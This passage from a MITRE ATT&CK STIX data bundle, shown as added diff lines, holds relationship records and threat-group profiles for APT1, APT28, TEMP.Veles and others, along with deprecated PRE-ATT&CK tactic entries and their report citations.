Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "type": "relationship", + "modified": "2019-08-20T13:08:13.554Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "target_ref": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "relationship_type": "related-to", + "id": "relationship--1aafdefb-304e-4998-87cc-81aad295f721", + "type": "relationship", + "modified": "2019-02-19T18:56:56.136Z", + "created": "2019-02-19T18:56:56.136Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "target_ref": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "relationship_type": "related-to", + "id": "relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d", + "type": "relationship", + "modified": "2019-02-19T18:56:56.770Z", + "created": "2019-02-19T18:56:56.770Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6", + "external_references": [ + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. 
Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + } + ], + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used Virtual Private Server (VPS) infrastructure.(Citation: FireEye TRITON 2019)", + "relationship_type": "uses", + "id": "relationship--2d95ed6f-52e7-4708-af15-9a6c08390454", + "type": "relationship", + "modified": "2019-04-29T18:59:16.595Z", + "created": "2019-04-24T19:45:44.205Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "external_references": [ + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + } + ], + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used dynamic DNS.(Citation: FireEye TRITON 2019)", + "relationship_type": "uses", + "id": "relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2", + "type": "relationship", + "modified": "2019-04-29T18:59:16.596Z", + "created": "2019-04-24T19:45:44.212Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "target_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). 
APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "description": "[APT1](https://attack.mitre.org/groups/G0006) compromised a vast set of 3rd party victim hop points as part of their network infrastructure. For example, [APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points. Mandiant considers them to be \u201chijacked\u201d since they were originally registered for a legitimate reason but were used by APT1 for malicious purposes.(Citation: Mandiant APT1)", + "relationship_type": "uses", + "id": "relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5", + "type": "relationship", + "modified": "2020-03-25T13:59:27.774Z", + "created": "2020-03-25T13:59:27.774Z" + }, + { + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "The MITRE Corporation", + "identity_class": "organization", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "identity", + "modified": "2017-06-01T00:00:00.000Z", + "created": "2017-06-01T00:00:00.000Z" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT1", + "description": "[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People\u2019s Liberation Army (PLA) General Staff Department\u2019s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. 
(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0006", + "external_id": "G0006" + }, + { + "source_name": "APT1", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Crew", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Group", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Panda", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "source_name": "CrowdStrike Putter Panda" + } + ], + "aliases": [ + "APT1", + "Comment Crew", + "Comment Group", + "Comment Panda" + ], + "modified": "2020-10-22T18:35:55.290Z", + "created": "2017-05-31T21:31:47.955Z", + "x_mitre_version": "1.3" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT16", + "description": "[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. 
(Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0023", + "external_id": "G0023" + }, + { + "source_name": "APT16", + "description": "(Citation: FireEye EPS Awakens Part 2)" + }, + { + "source_name": "FireEye EPS Awakens Part 2", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + } + ], + "aliases": [ + "APT16" + ], + "modified": "2020-10-12T19:54:58.537Z", + "created": "2017-05-31T21:31:56.270Z", + "x_mitre_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT17", + "description": "[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0025", + "external_id": "G0025" + }, + { + "source_name": "APT17", + "description": "(Citation: FireEye APT17)" + }, + { + "source_name": "Deputy Dog", + "description": "(Citation: FireEye APT17)" + }, + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. 
Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "aliases": [ + "APT17", + "Deputy Dog" + ], + "modified": "2020-10-13T22:33:14.018Z", + "created": "2017-05-31T21:31:57.307Z", + "x_mitre_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT28", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. 
(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "G0007", + "url": "https://attack.mitre.org/groups/G0007", + "source_name": "mitre-attack" + }, + { + "source_name": "APT28", + "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)" + }, + { + "source_name": "SNAKEMACKEREL", + "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Swallowtail", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "Group 74", + "description": "(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Sednit", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT. 
(Citation: FireEye APT28 January 2017) (Citation: SecureWorks TG-4127) (Citation: Kaspersky Sofacy) (Citation: Ars Technica GRU indictment Jul 2018)" + }, + { + "source_name": "Sofacy", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware. (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Pawn Storm", + "description": "(Citation: SecureWorks TG-4127) (Citation: ESET Sednit Part 3)" + }, + { + "source_name": "Fancy Bear", + "description": "(Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)" + }, + { + "source_name": "STRONTIUM", + "description": "(Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Microsoft STRONTIUM Aug 2019) (Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)" + }, + { + "source_name": "Tsar Team", + "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Threat Group-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "TG-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). 
Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + }, + { + "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.", + "source_name": "Ars Technica GRU indictment Jul 2018" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign", + "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.", + "source_name": "SecureWorks TG-4127" + }, + { + "source_name": "FireEye APT28 January 2017", + "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. 
Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018." + }, + { + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", + "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", + "source_name": "ESET Zebrocy May 2019" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). 
En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + }, + { + "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.", + "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "source_name": "Talos Seduploader Oct 2017" + }, + { + "source_name": "Securelist Sofacy Feb 2018", + "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018." + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019." + }, + { + "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", + "source_name": "Microsoft STRONTIUM Aug 2019" + }, + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020." 
+ } + ], + "aliases": [ + "APT28", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", + "Sednit", + "Sofacy", + "Pawn Storm", + "Fancy Bear", + "STRONTIUM", + "Tsar Team", + "Threat Group-4127", + "TG-4127" + ], + "modified": "2020-10-06T23:32:21.793Z", + "created": "2017-05-31T21:31:48.664Z", + "x_mitre_contributors": [ + "S\u00e9bastien Ruel, CGI", + "Drew Church, Splunk", + "Emily Ratliff, IBM", + "Richard Gold, Digital Shadows" + ], + "x_mitre_version": "3.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Cleaver", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0003", + "external_id": "G0003" + }, + { + "source_name": "Cleaver", + "description": "(Citation: Cylance Cleaver)" + }, + { + "source_name": "Threat Group 2889", + "description": "(Citation: Dell Threat Group 2889)" + }, + { + "source_name": "TG-2889", + "description": "(Citation: Dell Threat Group 2889)" + }, + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + }, + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). 
Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "aliases": [ + "Cleaver", + "Threat Group 2889", + "TG-2889" + ], + "modified": "2020-10-15T16:59:26.732Z", + "created": "2017-05-31T21:31:46.390Z", + "x_mitre_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Night Dragon", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0014", + "external_id": "G0014" + }, + { + "source_name": "Night Dragon", + "description": "(Citation: McAfee Night Dragon)" + }, + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. 
Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "aliases": [ + "Night Dragon" + ], + "modified": "2020-10-15T00:54:00.656Z", + "created": "2017-05-31T21:31:51.643Z", + "x_mitre_version": "1.3" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://attack.mitre.org/groups/G0088", + "source_name": "mitre-attack", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON.(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )" + }, + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + }, + { + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "source_name": "FireEye TEMP.Veles 2018" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html", + "description": "Miller, S., et al. (2019, April 10). 
TRITON Appendix C. Retrieved April 29, 2019." + }, + { + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/", + "source_name": "Dragos Xenotime 2018" + }, + { + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/", + "source_name": "Pylos Xenotime 2019" + }, + { + "source_name": "FireEye TEMP.Veles 2018 ", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019." + } + ], + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "modified": "2020-10-04T23:31:36.937Z", + "created": "2019-04-16T15:14:38.533Z", + "x_mitre_version": "1.2" + }, + { + "id": "x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Adversary OPSEC", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0021/).\n\nAdversary OPSEC consists of the use of various technologies or 3rd party services to obfuscate, hide, or blend in with accepted network traffic or system behavior. The adversary may use these techniques to evade defenses, reduce attribution, minimize discovery, and/or increase the time and effort required to analyze.", + "external_references": [ + { + "external_id": "TA0021", + "url": "https://attack.mitre.org/tactics/TA0021", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "adversary-opsec", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:36:37.579Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0024/).\n\nBuilding capabilities consists of developing and/or acquiring the software, data and techniques used at different phases of an operation. 
This is the process of identifying development requirements and implementing solutions such as malware, delivery mechanisms, obfuscation/cryptographic protections, and call back and O&M functions.", + "external_references": [ + { + "external_id": "TA0024", + "url": "https://attack.mitre.org/tactics/TA0024", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "build-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:02.517Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Establish & Maintain Infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0022/).\n\nEstablishing and maintaining infrastructure consists of building, purchasing, co-opting, and maintaining systems and services used to conduct cyber operations. 
An adversary will need to establish infrastructure used to communicate with and control assets used throughout the course of their operations.", + "external_references": [ + { + "external_id": "TA0022", + "url": "https://attack.mitre.org/tactics/TA0022", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "establish-&-maintain-infrastructure", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:37:16.235Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Organizational Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0017/).\n\nOrganizational information gathering consists of the process of identifying critical organizational elements of intelligence an adversary will need about a target in order to best attack.\u00a0 Similar to competitive intelligence, organizational intelligence gathering focuses on understanding the operational tempo of an organization and gathering a deep understanding of the organization and how it operates, in order to best develop a strategy to target it.", + "external_references": [ + { + "external_id": "TA0017", + "url": "https://attack.mitre.org/tactics/TA0017", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "organizational-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:34:54.996Z", + "created": "2018-10-17T00:14:20.652Z", + 
